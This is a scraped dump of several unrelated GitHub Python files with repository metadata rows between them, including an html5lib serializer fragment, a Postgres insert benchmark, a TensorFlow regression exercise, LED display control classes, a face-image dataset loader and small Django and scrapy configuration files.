if name in voidElements and self.use_trailing_solidus:
if self.space_before_trailing_solidus:
yield self.encodeStrict(" /")
else:
yield self.encodeStrict("/")
yield self.encode(">")
elif type == "EndTag":
name = token["name"]
if name in rcdataElements:
in_cdata = False
elif in_cdata:
self.serializeError("Unexpected child element of a CDATA element")
yield self.encodeStrict("</%s>" % name)
elif type == "Comment":
data = token["data"]
if data.find("--") >= 0:
self.serializeError("Comment contains --")
yield self.encodeStrict("<!--%s-->" % token["data"])
elif type == "Entity":
name = token["name"]
key = name + ";"
if key not in entities:
self.serializeError("Entity %s not recognized" % name)
if self.resolve_entities and key not in xmlEntities:
data = entities[key]
else:
data = "&%s;" % name
yield self.encodeStrict(data)
else:
self.serializeError(token["data"])
def render(self, treewalker, encoding=None):
"""Serializes the stream from the treewalker into a string
:arg treewalker: the treewalker to serialize
:arg encoding: the string encoding to use
:returns: the serialized tree
Example:
>>> from html5lib import parse, getTreeWalker
>>> from html5lib.serializer import HTMLSerializer
>>> token_stream = parse('<html><body>Hi!</body></html>')
>>> walker = getTreeWalker('etree')
>>> serializer = HTMLSerializer(omit_optional_tags=False)
>>> serializer.render(walker(token_stream))
'<html><head></head><body>Hi!</body></html>'
"""
if encoding:
return b"".join(list(self.serialize(treewalker, encoding)))
else:
return "".join(list(self.serialize(treewalker)))
def serializeError(self, data="XXX ERROR MESSAGE NEEDED"):
# XXX The idea is to make data mandatory.
self.errors.append(data)
if self.strict:
raise SerializeError
class SerializeError(Exception):
"""Error in serialized tree"""
pass
| [
"tangpeng@qq.com"
] | tangpeng@qq.com |
65c34ae7d029b3c2d46eebd148a9498d70551092 | 3e1b24261b1960315379d3cfabd19dedb2516510 | /Investigations/N-Grams/test_write.py | 83609f45bb0e8d21f2847e7d47fa58545d168201 | [] | no_license | Sentimentron/Utah | 56dbe308113f321df0ded8464cb1bfc7b09da281 | 305ddfa8a3b7a188c3aa0b9ca814fc0e4298cbbc | refs/heads/master | 2021-01-10T15:37:15.083264 | 2016-03-12T18:04:44 | 2016-03-12T18:05:11 | 53,739,381 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,541 | py | #!/bin/env python
import pickle
import postgresql
import logging
import time
import numpy
import random
if __name__ == "__main__":
db = postgresql.open("pq://worker:worker@localhost/keywords")
logging.info("Dropping database tables...")
db.query("drop owned by current_user");
logging.info("Opening dump file")
with open("words.pkl", "rb") as f:
words = pickle.load(f)
logging.info("Creating database tables...")
db.query(r"""CREATE TABLE keywords (id SERIAL, word TEXT UNIQUE NOT NULL)""")
logging.info("Picking some random words...")
# Pick about 10000 words for a sample read test
sample = list(words)
random.shuffle(sample)
sample = sample[:10000]
logging.info("Starting insertions")
stmt = db.prepare(r"""INSERT INTO keywords (word) VALUES ($1) ON CONFLICT DO
NOTHING""")
check = db.prepare("SELECT id FROM keywords WHERE word = $1")
results = []
for i, word in enumerate(words):
start = time.clock()
stmt(word)
end = time.clock()
results.append(end-start)
if i % 10000 == 0:
print("Written %.2f of all words" % (i*100.0/len(words)),)
avg_writes = numpy.mean(results)
print("Average words/second: %.2f" % (1/avg_writes,))
results = []
start = time.clock()
for s in sample:
for row in check(s):
pass
end = time.clock()
print("Read test took %.4f seconds" % (end-start))
| [
"richard@sentimentron.co.uk"
] | richard@sentimentron.co.uk |
a6ad3ef6884b158ee379e6fd362ad8f836abefb8 | 934f5e69784ec6bf6ddb0a3c0a8b65e7b8eedcee | /test2.py | 39b54fc0c2b6e2aa4b25675853288102c26d5d92 | [] | no_license | liuxiaoxi99/Deep-Learning-Course | 7752a797bebfdb10c5d5b1e0f9a008c5d38ddeb1 | d8a5461eaec11c5c518d8a9abe162ea9d9258754 | refs/heads/master | 2021-02-17T17:34:49.430553 | 2020-05-03T13:26:19 | 2020-05-03T13:26:19 | 245,114,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
np.random.seed(5)
x_data=np.linspace(0,100,500)
y_data=3.1234*x_data+2.98+np.random.randn(x_data.shape)*0.4
plt.scatter(x_data,y_data)
plt.plot(x_data,3.1234*x_data+2.98,"r")
def model(x,w,b):
return tf.multiply(x,w)+b
w=tf.Variable(1.0,tf.float32)
b=tf.Variable(0.0,tf.float32)
def loss(x,y,w,b):
err=model(x,w,b)-y
squared_err=tf.square(err)
return tf.reduce_mean(squared_err)
training_epochs=10
learning_rate=0.0001
def grad(x,y,w,b):
with tf.GradientTape() as tape:
loss_=loss(x,y,w,b)
return tape.gradient(loss_,[w,b])
step=0
loss_list=[]
display_step=20
for epoch in range(training_epochs):
for xs,ys in zip(x_data,y_data):
loss_=loss(xs,ys,w,b)
loss_list.append(loss_)
delta_w,delta_b=grad(xs,ys,w,b)
change_w=delta_w*learning_rate
change_b=delta_b*learning_rate
w.assign_sub(change_w)
b.assign_sub(change_b)
step+=1
if step % display_step == 0:
print("Training Epoch:",'%d'%(epoch+1),"Step:%d"%(step),"loss=%f"%(loss_))
plt.plot(x_data,w.numpy()*x_data+b.numpy())
print("预测x=5.79时,y的值:",model(w,5.79,b))
plt.show() | [
"noreply@github.com"
] | liuxiaoxi99.noreply@github.com |
baf12697e198e067d2e64cbb25a3e47e7ad787b0 | 5a15698f16cb66bf1477f067cec8eb9285fa4041 | /led_display/app_controls.py | c6c0fc956e40314941f8e676e70e7986944906e4 | [
"MIT"
] | permissive | sodium24/led-display | 1e12f0832feb2fb3b0dd09d9655b2915ac4577ba | a5260b9c262f4e0cf64286205e69ab6e5a516fb4 | refs/heads/master | 2023-06-18T22:09:07.543472 | 2021-07-03T06:15:14 | 2021-07-03T06:15:14 | 376,031,828 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,756 | py | ################################################################################
# app_controls.py
#-------------------------------------------------------------------------------
# Control elements an app may use to simplify interacting with the LED display
# directly.
#
# By Malcolm Stagg
#
# Copyright (c) 2021 SODIUM-24, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
import weakref
from PIL import Image
from rgbmatrix import graphics
class Control(object):
"""
Graphical control base object
"""
def __init__(self, control_id, app_base):
"""
Initialize the control with an ID and app reference
"""
self.control_id = control_id
self.app_base = weakref.ref(app_base)
self.z_index = 0
self.enabled = True
def delete(self):
"""
Delete the control
"""
self.app_base()._delete_control(self.control_id)
def get_static(self):
"""
Returns whether the display contents is static
"""
return True
def on_frame(self):
"""
Handles a new frame event, for dynamic controls (scrolling, etc)
"""
return
def draw(self, canvas):
"""
Draw the control's graphical data on the canvas.
"""
return
static = property(get_static)
class TextControl(Control):
"""
Control for displaying text
"""
def __init__(self, control_id, app_base):
"""
Initialize the control with an ID and app reference
"""
super(TextControl, self).__init__(control_id, app_base)
self._font = ""
self._font_obj = None
self._text = ""
self._width = 0
self._scroll_mode = "none"
self._color = [0, 0, 0]
self._color_obj = graphics.Color(*self._color)
self._x = 0
self._y = 0
self._align = "left"
self._scrolling = False
self._scroll_pos = 0
self._scroll_dir = 0
def set_font(self, font_name):
"""
Set a font by name for the text
"""
if font_name != self._font:
self._font = font_name
self._font_obj = self.app_base().load_font(font_name)
self._update()
def get_font(self):
"""
Retrieve a font by name for the text
"""
return self._font
def set_text(self, text):
"""
Set displayed text
"""
if text != self._text:
self._text = text
self._update()
def get_text(self):
"""
Retrieve displayed text
"""
return self._text
def set_x(self, x):
"""
Set x coordinate for where to draw the text
"""
self._x = x
def get_x(self):
"""
Retrieve x coordinate for where to draw the text
"""
return self._x
def set_y(self, y):
"""
Set y coordinate for where to draw the text (bottom of character)
"""
self._y = y
def get_y(self):
"""
Retrieve y coordinate for where to draw the text (bottom of character)
"""
return self._y
def set_scroll(self, scroll_mode):
"""
Set scroll mode (auto, none) for whether the text should scroll if too long
"""
self._scroll_mode = scroll_mode
self._update_scroll()
def get_scroll(self):
"""
Retrieve scroll mode (auto, none) for whether the text should scroll if too long
"""
return self._scroll_mode
def set_align(self, align):
"""
Set text alignment (left, center, right)
"""
self._align = align
def get_align(self):
"""
Retrieve text alignment (left, center, right)
"""
return self._align
def set_color(self, color):
"""
Set text color, as [r, g, b] from 0 to 255
"""
self._color = color
self._color_obj = graphics.Color(*self._color)
def get_color(self):
"""
Retrieve text color, as [r, g, b] from 0 to 255
"""
return self._color
def _update(self):
"""
Update text width based on current parameters
"""
self._width = 0
if self._font_obj is not None:
for character in self._text:
self._width += self._font_obj.CharacterWidth(ord(character))
self._update_scroll()
def _update_scroll(self):
"""
Update whether the text will scroll based on current parameters
"""
self._scrolling = (self._width > self.app_base().offscreen_canvas.width and self._scroll_mode == "auto")
def get_static(self):
"""
Retrieve text color, as [r, g, b] from 0 to 255
"""
return not self._scrolling
def on_frame(self):
"""
Handles a new frame event, for scrolling
"""
if not self._scrolling:
return
if self._scroll_dir == 0:
self._scroll_pos += 1
if self._scroll_pos >= self._width:
self._scroll_pos = -self.app_base().offscreen_canvas.width
else:
self.scrolling[index]["pos"] -= 1
if self.scrolling[index]["pos"] <= -self.app_base().offscreen_canvas.width:
self.scrolling[index]["dir"] = self._width
def draw(self, canvas):
"""
Draw the control's graphical data on the canvas.
"""
x = self._x
if self._align == "right":
x -= self._width
elif self._align == "center":
x -= self._width / 2
x_offset = 0
if self._scrolling:
x = max(0, x)
x_offset = -self._scroll_pos
if self._font_obj is not None and self._color_obj is not None:
graphics.DrawText(canvas, self._font_obj, x + x_offset, self._y, self._color_obj, self._text)
font = property(get_font, set_font)
text = property(get_text, set_text)
scroll = property(get_scroll, set_scroll)
color = property(get_color, set_color)
x = property(get_x, set_x)
y = property(get_y, set_y)
align = property(get_align, set_align)
static = property(get_static)
class ImageControl(Control):
"""
Control for displaying an image file
"""
def __init__(self, control_id, app_base):
"""
Initialize the control with an ID and app reference
"""
super(ImageControl, self).__init__(control_id, app_base)
self._filename = ""
self._x = 0
self._y = 0
self._width = 0
self._height = 0
self._image = None
def set_filename(self, filename):
"""
Set filename of image to display
"""
if filename != self._filename:
self._filename = filename
self._update()
def get_filename(self):
"""
Retrieve filename of image to display
"""
return self._filename
def set_x(self, x):
"""
Set x coordinate of image (top-left)
"""
self._x = x
def get_x(self):
"""
Retrieve x coordinate of image (top-left)
"""
return self._x
def set_y(self, y):
"""
Set y coordinate of image (top-left)
"""
self._y = y
def get_y(self):
"""
Retrieve y coordinate of image (top-left)
"""
return self._y
def set_width(self, width):
"""
Set width of image
"""
if width != self._width:
self._width = width
self._update()
def get_width(self):
"""
Retrieve width of image
"""
return self._width
def set_height(self, height):
"""
Set height of image
"""
if height != self._height:
self._height = height
self._update()
def get_height(self):
"""
Retrieve height of image
"""
return self._height
def _update(self):
"""
Load the image based on current parameters
"""
if self._filename != "" and self._width != 0 and self._height != 0:
image = Image.open(self._filename)
image.thumbnail((self._width, self._height), Image.BICUBIC)
self._image = image.convert('RGB')
def draw(self, canvas):
"""
Draw the control's graphical data on the canvas.
"""
if self._image is not None:
canvas.SetImage(self._image, offset_x=self._x, offset_y=self._y)
filename = property(get_filename, set_filename)
x = property(get_x, set_x)
y = property(get_y, set_y)
width = property(get_width, set_width)
height = property(get_height, set_height)
class FillControl(Control):
"""
Control to fill the canvas with a solid color
"""
def __init__(self, control_id, app_base):
"""
Initialize the control with an ID and app reference
"""
super(FillControl, self).__init__(control_id, app_base)
self._color = [0, 0, 0]
def set_color(self, color):
"""
Set fill color, as [r, g, b] from 0 to 255
"""
self._color = color
def get_color(self):
"""
Retrieve fill color, as [r, g, b] from 0 to 255
"""
return self._color
def draw(self, canvas):
"""
Draw the control's graphical data on the canvas.
"""
canvas.Fill(*self._color)
color = property(get_color, set_color)
class RectControl(Control):
"""
Control to draw a rectangle
"""
def __init__(self, control_id, app_base):
"""
Initialize the control with an ID and app reference
"""
super(RectControl, self).__init__(control_id, app_base)
self._stroke_color = [0, 0, 0]
self._stroke_color_obj = graphics.Color(*self._stroke_color)
self._fill_color = [0, 0, 0]
self._fill_color_obj = graphics.Color(*self._fill_color)
self._has_stroke = False
self._has_fill = False
self._x = 0
self._y = 0
self._width = 0
self._height = 0
def set_stroke_color(self, color):
"""
Set stroke color, as [r, g, b] from 0 to 255
"""
self._stroke_color = color
self._stroke_color_obj = graphics.Color(*self._stroke_color)
def get_stroke_color(self):
"""
Retrieve stroke color, as [r, g, b] from 0 to 255
"""
return self._stroke_color
def set_fill_color(self, color):
"""
Set fill color, as [r, g, b] from 0 to 255
"""
self._fill_color = color
self._fill_color_obj = graphics.Color(*self._fill_color)
def get_fill_color(self):
"""
Retrieve stroke color, as [r, g, b] from 0 to 255
"""
return self._fill_color
def set_has_stroke(self, enable):
"""
Set whether stroke is enabled (bool)
"""
self._has_stroke = enable
def get_has_stroke(self):
"""
Retrieve whether stroke is enabled (bool)
"""
return self._has_stroke
def set_has_fill(self, enable):
"""
Set whether fill is enabled (bool)
"""
self._has_fill = enable
def get_has_fill(self):
"""
Retrieve whether fill is enabled (bool)
"""
return self._has_fill
def set_x(self, x):
"""
Set x coordinate of rectangle (top-left)
"""
self._x = x
def get_x(self):
"""
Retrieve x coordinate of rectangle (top-left)
"""
return self._x
def set_y(self, y):
"""
Set y coordinate of rectangle (top-left)
"""
self._y = y
def get_y(self):
"""
Retrieve y coordinate of rectangle (top-left)
"""
return self._y
def set_width(self, width):
"""
Set width of rectangle
"""
self._width = width
def get_width(self):
"""
Retrieve width of rectangle
"""
return self._width
def set_height(self, height):
"""
Set height of rectangle
"""
self._height = height
def get_height(self):
"""
Retrieve height of rectangle
"""
return self._height
def draw(self, canvas):
"""
Draw the control's graphical data on the canvas.
"""
if self._has_fill:
for y in range(self._y, self._y + self._height):
graphics.DrawLine(canvas, self._x, y, self._x + self._width, y, self._fill_color_obj)
if self._has_stroke:
graphics.DrawLine(canvas, self._x, y, self._x + self._width, y, self._stroke_color_obj)
graphics.DrawLine(canvas, self._x+self._width, y, self._x+self._width, y+self._height, self._stroke_color_obj)
graphics.DrawLine(canvas, self._x, y+self._height, self._x + self._width, y+self._height, self._stroke_color_obj)
graphics.DrawLine(canvas, self._x, y, self._x, y+self._height, self._stroke_color_obj)
stroke_color = property(get_stroke_color, set_stroke_color)
fill_color = property(get_fill_color, set_fill_color)
has_stroke = property(get_has_stroke, set_has_stroke)
has_fill = property(get_has_fill, set_has_fill)
x = property(get_x, set_x)
y = property(get_y, set_y)
width = property(get_width, set_width)
height = property(get_height, set_height)
| [
"malcolmst@gmail.com"
] | malcolmst@gmail.com |
91f260cf71db0de0e80ef889491e1b41ea62cfa3 | 1987ad7e2ac29ff115d6a8442cf4257f4cb2f472 | /scrapping/config/config.py | 463f8991dc6115769b4f552e839e19ab125d4d4a | [
"MIT"
] | permissive | andytb/scrapy-project | d412dfd662b3eb5a44b14486cf6d2f19af0aa5e7 | 577c860cd4d48b8b03ecdf911350ca013f42d83d | refs/heads/master | 2020-03-13T23:38:11.161360 | 2018-05-23T21:58:27 | 2018-05-23T21:58:27 | 131,339,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | class Config:
USER_AGENT = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'
URLS_TO_SCRAP = [
'http://quotes.toscrape.com/page/1/'
]
DOMAINS_TO_SCRAP = [
'toscrape.com'
]
KEYWORDS_FILTER = [
'Harry',
'value',
'love'
]
| [
"andy.teea@gmail.com"
] | andy.teea@gmail.com |
fd6031cd9788e6476f242b52aa82d334c941e20a | 68ef9983a00f555b8d8cd0b961e4a58b29506b0a | /create_data.py | a3d72e0ca4872042656082db6d01f8eb744172a1 | [] | no_license | ttrunghieu201195/CNNs | 5d7e4f471ef158ecd90fa6d8fd2f33b4a1b6de20 | 0f321f5d3a0e9781074abd6a9aca7b22ed33872b | refs/heads/master | 2021-01-19T10:32:09.471984 | 2017-07-23T17:28:05 | 2017-07-23T17:28:05 | 87,875,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,103 | py | import matplotlib.pyplot as plt
import os
import tensorflow as tf
from tqdm import tqdm
from random import shuffle
import cv2
import numpy as np
fig=plt.figure()
# ngoc, nguyen, ky, truong, phhuc, duc, huyen, thinh, duyen, hieu, lgiang, giang, hau, my, btran, tram, manh
train_dir = '/home/manhthe/project/dulieu/train'
train_list=[os.path.join(train_dir,folder) for folder in
os.listdir(train_dir) if not folder.startswith('.')]
valid_dir = '/home/manhthe/project/dulieu/valid'
valid_list = [os.path.join(valid_dir,folder) for folder in
os.listdir(valid_dir) if not folder.startswith('.')]
test_dir = '/home/manhthe/project/dulieu/test'
test_list = [os.path.join(test_dir,folder) for folder in
os.listdir(test_dir) if not folder.startswith('.')]
check_dir = '/home/manhthe/Downloads/Desktop/giangoc'
# ngoc_dir = '/home/ngoc/luanvan/huyen'
# ngoc_dir = '/home/ngoc/luanvan/ngoc'
# tram_dir = '/home/ngoc/luanvan/Tram'
# tran_dir = '/home/ngoc/luanvan/tran'
# lgiang_dir = '/home/ngoc/luanvan/Giang'
IMG_SIZE = 128
def one_hot(element,list_of_elements):
''' ex:- one_hot('C',['A','B','C','D']) returns [0,0,1,0]
in your case,
element = absolute path of a subfolder
list_of_elements = list of folders in main folder i.e os.listdir(main_folder)
'''
k=[0 for i in range(len(list_of_elements))]
index=list_of_elements.index(element)
k[index]=1
return k
def create_train_data():
training_data = []
for folder in train_list:
label = one_hot(folder,train_list)
# print folder
for img in tqdm(os.listdir(folder)):
path = os.path.join(folder,img)
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))
img = img.reshape(IMG_SIZE*IMG_SIZE)
training_data.append([np.array(img),np.array(label)])
shuffle(training_data)
# np.save('train_data', training_data)
print("Create train data success!!!")
return training_data
def create_valid_data():
eval_data = []
for folder in valid_list:
label = one_hot(folder,valid_list)
# print folder
for img in tqdm(os.listdir(folder)):
path = os.path.join(folder,img)
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))
img = img.reshape(IMG_SIZE*IMG_SIZE)
eval_data.append([np.array(img),np.array(label)])
shuffle(eval_data)
# np.save('valid_data', eval_data)
print("Create valid data success!!!")
return eval_data
def create_test_data():
testing_data = []
for folder in test_list:
label = one_hot(folder,test_list)
for img in tqdm(os.listdir(folder)):
path = os.path.join(folder,img)
# img_num = img.split('.')[0]
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))
img = img.reshape(IMG_SIZE*IMG_SIZE)
testing_data.append([np.array(img),np.array(label)])
print(folder)
shuffle(testing_data)
# np.save('test_data', testing_data)
print("Create test data success!!!")
return testing_data
def test_data_random():
check_data = []
for img in os.listdir(check_dir):
path = os.path.join(check_dir,img)
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, (IMG_SIZE,IMG_SIZE))
img = img.reshape(IMG_SIZE*IMG_SIZE)
check_data.append([np.array(img)])
print(folder)
shuffle(check_data)
# np.save('lgiang_data.npy', check_data)
print("Create test data success!!!")
return check_data
# train_data = create_train_data()
# print("Size of train data:",len(train_data))
# eval_data = create_eval_data()
# print("Size of eval data:",len(eval_data))
# # test_data = process_test_data()
# test_data = process_test_data()
# print("Size of test data:",len(test_data))
# random_data = test_data_random()
# print("Size of test data:",len(random_data))
# print(random_data[0])
| [
"noreply@github.com"
] | ttrunghieu201195.noreply@github.com |
2420c54f791413642767813dfd8347704d94dceb | 5969c67fccfe0a7aa7daa6592582c92de73c71db | /server/server/urls.py | abe0051a3821d709a368b838f65376e2895757c9 | [] | no_license | llm123456/games | 8d44f426eb369672b4e14f2ed3246d6a12b2ba0b | 15b89845c984de6a76746e0f48bc8cd48d05d0e8 | refs/heads/master | 2020-04-19T03:34:45.502742 | 2019-01-29T06:52:53 | 2019-01-29T06:52:53 | 167,938,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | """server URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from restapi import urls
urlpatterns = [
path('admin/', admin.site.urls),
path('api/', urls),
]
| [
"lijiang71"
] | lijiang71 |
f9ab294c7952ed0de17c16970f6acc6bab6a37e2 | 5587bf97e43a24b1a23a68f6c6b7692fa6c7aea5 | /dataset_feat.py | 89e110a8e517ad58d3eca2a43648da2f6c5e26e7 | [] | no_license | DogsHeadZ/WVAD | 743f42a6203bcd0e97bb2633acdae545c6fd2e4b | 91382923b4bcb7c83fc8776fbd2cf3d096ee6ba8 | refs/heads/master | 2023-08-14T12:55:27.833515 | 2021-09-07T02:25:33 | 2021-09-07T02:25:33 | 400,154,068 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,267 | py | import torch.utils.data as data
import numpy as np
import torch
import numpy as np
import h5py
import cv2
import os
from torch.utils.data import DataLoader
torch.set_default_tensor_type('torch.cuda.FloatTensor')
def process_feat(feat, length): # 在训练时用到这个函数,因为预训练的特征是等间隔16划分的即T是不固定的,这里是为了将T固定为32(通过合并特征)
new_feat = np.zeros((length, feat.shape[1])).astype(np.float32)
r = np.linspace(0, len(feat), length + 1, dtype=np.int)
for i in range(length):
if r[i] != r[i + 1]:
new_feat[i, :] = np.mean(feat[r[i]:r[i + 1], :], 0)
else:
new_feat[i, :] = feat[r[i], :]
return new_feat
class Dataset_f(data.Dataset):
def __init__(self, rgb_list_file, rgb_file, flow_file, train_txt, test_txt, test_mask_dir, is_normal=True, segment_len=16, transform=None, test_mode=False):
self.rgb_list_file = rgb_list_file
self.rgb_file = rgb_file
self.flow_file = flow_file
self.train_txt = train_txt
self.test_txt = test_txt
self.test_mask_dir = test_mask_dir
self.is_normal = is_normal
self.segment_len = segment_len
self.tranform = transform
self.test_mode = test_mode
if not test_mode:
self.get_vid_names_dict()
if is_normal:
self.selected_keys = list(self.norm_vid_names_dict.keys())
self.selected_dict = self.norm_vid_names_dict
else:
self.selected_keys = list(self.abnorm_vid_names_dict.keys())
self.selected_dict = self.abnorm_vid_names_dict
else:
self.test_dict_annotation()
self.selected_keys = list(self.annotation_dict.keys())
self.selected_dict = self.annotation_dict
self._parse_list()
def get_vid_names_dict(self):
keys = sorted(list(h5py.File(self.rgb_file, 'r').keys()))
self.norm_vid_names_dict = {}
self.abnorm_vid_names_dict = {}
for line in open(self.train_txt,'r').readlines():
key,label=line.strip().split(',')
if label=='1':
for k in keys:
if key == k.split('-')[0]:
if key in self.abnorm_vid_names_dict.keys():
self.abnorm_vid_names_dict[key]+=1
else:
self.abnorm_vid_names_dict[key]=1
else:
for k in keys:
if key == k.split('-')[0]:
if key in self.norm_vid_names_dict.keys():
self.norm_vid_names_dict[key]+=1
else:
self.norm_vid_names_dict[key]=1
def test_dict_annotation(self):
self.annotation_dict = {}
keys=sorted(list(h5py.File(self.rgb_file, 'r').keys()))
for line in open(self.test_txt,'r').readlines():
key,anno_type,frames_num = line.strip().split(',') # 这里的framenum是错的
frames_seg_num = 0
for k in keys:
if k.split('-')[0] == key:
frames_seg_num += 1
if anno_type=='1':
label='Abnormal'
anno = np.load(os.path.join(self.test_mask_dir, key + '.npy'))[:frames_seg_num * self.segment_len]
else:
label='Normal'
anno=np.zeros(frames_seg_num * self.segment_len,dtype=np.uint8)
self.annotation_dict[key]=[anno,frames_seg_num]
def _parse_list(self):
self.list = list(open(self.rgb_list_file))
if self.test_mode is False:
if self.is_normal:
self.list = self.list[63:]
print('normal list')
# print(self.list)
else:
self.list = self.list[:63]
print('abnormal list')
# print(self.list)
def __getitem__(self, index):
# 这里是加载RTFM给的特征
label = self.get_label(index) # get video level label 0/1
features = np.load(self.list[index].strip('\n'), allow_pickle=True)
features = np.array(features, dtype=np.float32)
if self.tranform is not None:
features = self.tranform(features)
if self.test_mode:
frames_seg_num = features.shape[0]
key = self.list[index].strip('\n').split('/')[-1].split('.')[0][:-4]
if index<44:
anno = np.load(os.path.join(self.test_mask_dir, key + '.npy'))[:frames_seg_num * self.segment_len]
if anno.shape[0] < frames_seg_num * self.segment_len:
anno = anno[:(frames_seg_num-1) * self.segment_len]
features = features[:-1]
else:
anno=np.zeros(frames_seg_num * self.segment_len,dtype=np.uint8)
return features, features, anno
else:
features = features.transpose(1, 0, 2) # [10, T, F]
divided_features = []
for feature in features:
feature = process_feat(feature, 32)
divided_features.append(feature)
divided_features = np.array(divided_features, dtype=np.float32)
return divided_features, divided_features, label
########################## #这里是加载我们提取的i3d特征,效果很差,就没用下面这些代码,但暂且保留
key = self.selected_keys[index]
if not self.test_mode:
video_len = self.selected_dict[key]
else:
video_len = self.selected_dict[key][1]
frame_feats = []
flow_feats = []
with h5py.File(self.rgb_file, 'r') as rgb_h5, h5py.File(self.flow_file, 'r') as flow_h5:
for i in range(video_len):
frame_feats.extend(rgb_h5[key + '-{0:06d}'.format(i)][:]) # [1,1024]
flow_feats.extend(flow_h5[key + '-{0:06d}'.format(i)][:])
frame_feats = np.stack(frame_feats)
flow_feats = np.stack(flow_feats)
label = self.get_label(index) # get video level label 0/1
if self.tranform is not None:
frame_feats = self.tranform(frame_feats)
flow_feats = self.tranform(flow_feats)
if self.test_mode:
anno = self.annotation_dict[key][0]
return torch.from_numpy(frame_feats).unsqueeze(0), torch.from_numpy(flow_feats).unsqueeze(0), torch.from_numpy(anno)
else:
frame_feats = process_feat(frame_feats, 32) # [32, F]
frame_feats = np.array(frame_feats, dtype=np.float32)
flow_feats = process_feat(flow_feats, 32) # [32, F]
flow_feats = np.array(flow_feats, dtype=np.float32)
return torch.from_numpy(frame_feats).unsqueeze(0), torch.from_numpy(flow_feats).unsqueeze(0), torch.from_numpy(label)
def get_label(self, index):
if self.is_normal:
# label[0] = 1
label = np.zeros(1, dtype=np.float32)
else:
label = np.ones(1, dtype=np.float32)
# label[1] = 1
return label
def __len__(self):
return len(self.selected_keys)
| [
"565807094@qq.com"
] | 565807094@qq.com |
fe6aaab1a8339dd6dc8d16d83021eb02079bdd3c | cc352b04dc8eb5033399a8925274f23be51ae3bf | /leonardo/__init__.py | 778f36dfa838719fd5e13576cde4c652cb4a8cd6 | [
"BSD-2-Clause"
] | permissive | lukaszle/django-leonardo | 1dcb16f0155495d4ef0e52f667450ee53f2b58be | a54dd0822c3d8fbf4a52547d0ad3ae17c04b88b7 | refs/heads/master | 2021-01-18T09:36:08.203184 | 2016-02-01T20:25:37 | 2016-02-01T20:25:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py |
default_app_config = 'leonardo.apps.LeonardoConfig'
__import__('pkg_resources').declare_namespace(__name__)
try:
from leonardo.base import leonardo # noqa
except ImportError:
import warnings
def simple_warn(message, category, filename, lineno, file=None, line=None):
return '%s: %s' % (category.__name__, message)
msg = ("Could not import Leonardo dependencies. "
"This is normal during installation.\n")
warnings.formatwarning = simple_warn
warnings.warn(msg, Warning)
| [
"6du1ro.n@gmail.com"
] | 6du1ro.n@gmail.com |
0721bd1f0daa8d45556597f6aa9566cd8f5898d8 | 1d37f6784db92f8ad0a186f38b9568439931e3c8 | /web/common/loader.py | cdd1efa0c75107000172cf575a630ed95da24dd7 | [] | no_license | songboyu/defect-mining | 1a79b725e7a3471b8b6ea5b872f030ded3809427 | 3f9370a869ae2e30f2831379ef877b16a4b71bca | refs/heads/master | 2021-01-22T23:21:18.087154 | 2017-06-01T09:51:17 | 2017-06-01T09:51:17 | 85,629,919 | 22 | 8 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | # -- coding: utf-8--
import web.settings
from web import mining
APPS = web.settings.APPS
def load_url_handlers():
return mining.url_handlers
| [
"benny.sby@alibaba-inc.com"
] | benny.sby@alibaba-inc.com |
3b1b0d692cb0b9bbbf3cc51edeeec124faad06eb | dc03c35f1bca775dac0d88021f01bd90f70a610f | /cf/models.py | be459324ff6fa1a77b361be8595bc1eda65acafe | [] | no_license | node31/semantic_search_collaborative_filtering | 98ced7d2471c2b9d883bd59ed2ca5335a1092176 | cd3e48123360d5430cdbb5d9558df117f3aa98ea | refs/heads/master | 2020-05-27T13:56:55.079630 | 2014-07-07T12:53:53 | 2014-07-07T12:53:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | from django.db import models
from django_mongokit.document import DjangoDocument
from django_mongokit import connection
from bson import ObjectId
class MyDocs(DjangoDocument):
structure={
'content':unicode,
'required_for':unicode,
}
use_dot_notation = True
connection.register([MyDocs])
